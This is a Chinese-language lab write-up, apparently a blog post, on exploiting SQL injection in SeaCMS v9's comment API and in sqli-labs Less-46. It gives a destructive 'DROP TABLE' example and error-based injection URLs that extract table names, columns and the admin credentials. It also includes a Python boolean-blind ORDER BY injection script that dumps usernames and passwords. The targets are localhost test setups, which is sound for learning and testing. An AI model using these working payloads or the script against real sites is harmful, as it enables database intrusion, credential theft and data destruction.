seacmsv9注入管理员账号密码+order by+limit

seacmsv9注入管理员账号密码+order by+limit

seacmsv9注入漏洞

seacmsv9漏洞文件：./comment/api/index.php

注入风险
在 Readmlist 函数中：

$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
直接将 $type 和 $id 的值嵌入到查询中。如果 $type 或 $id 变量没有经过适当的验证或清理，可以通过修改这些参数来执行恶意的 SQL 查询，从而导致 SQL 注入攻击。例如：

1; DROP TABLE sea_comment; –

在 Readrlist 函数中：

$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
$ids 变量直接用于 SQL 查询，如果 $ids 是由用户输入的，并且没有经过验证或过滤，可以传递恶意的输入来执行 SQL 注入攻击。

注入：
报错数据库名：

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`,extractvalue(1,concat_ws(0x7e,0x7e,database())),@`'`

报错表名：

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),%20@`%27`

这里发现无法报错，查看资料后，发现是sea_comment表没有数据，导致没有执行报错中的查询语句

于是可以在表中插入数据

INSERT INTO sea_comment (
    uid, v_id, typeid, username, ip, ischeck, dtime, msg, 
    m_type, reply, agree, anti, pic, vote
) VALUES 
(123, 456, 1, 'user1', '192.168.1.2', 1, UNIX_TIMESTAMP(), 'Nice video!', 0, 1, 5, 0, '', 3),
(124, 457, 2, 'user2', '192.168.1.3', 0, UNIX_TIMESTAMP(), 'Great content!', 0, 0, 8, 1, '', 2);

再次注入查看

报错字段名：

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%201,1))),%20@`%27`

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%202,1))),%20@`%27`

报错数据：

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20updatexml%20(1,concat_ws(0x20,0x5c,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

http://127.0.0.1/seacmsv9.1/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20updatexml%20(1,concat_ws(0x20,0x5c,(select%20password%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

进行MD5解密：

账号密码都是admin

order by +布尔盲注

由源码可得是通过sort传入的字段进行排序，于是用sort=if(表达式,id,username)的方式注入，通过BS爬虫爬取表格中的username下一格的值看是否等于Dumb来判断表达式的真假，可以使用二分法加快注入速度

代码：

import requests
from bs4 import BeautifulSoup
 
def get_username(response_text):
    soup = BeautifulSoup(response_text, 'html.parser')
    username = soup.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    return username.text if username else ''
 
def boolean_sqli_exploit(payload_template):
    result = ''
    i = 1
    while True:
        left, right = 32, 127
        while left < right:
            mid = (left + right) // 2
            url = payload_template.format(index=i, char_value=mid)
            resp = requests.get(url)
            if get_username(resp.text) == 'Dumb':
                left = mid + 1
            else:
                right = mid
        if left == 32:
            break
        result += chr(left)
        i += 1
        print(result)
    return result
 
def inject_database():
    payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr(database(),{index},1))>{char_value},id,username) -- "
    return boolean_sqli_exploit(payload)
 
def inject_tables():
    payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{char_value},id,username) -- "
    return boolean_sqli_exploit(payload)
 
def inject_columns():
    payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{char_value},id,username) -- "
    return boolean_sqli_exploit(payload)
 
def inject_data():
    payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{char_value},id,username) -- "
    return boolean_sqli_exploit(payload)
 
if __name__ == '__main__':
    # inject_database()
    # inject_tables()
    # inject_columns()
    inject_data()

运行结果：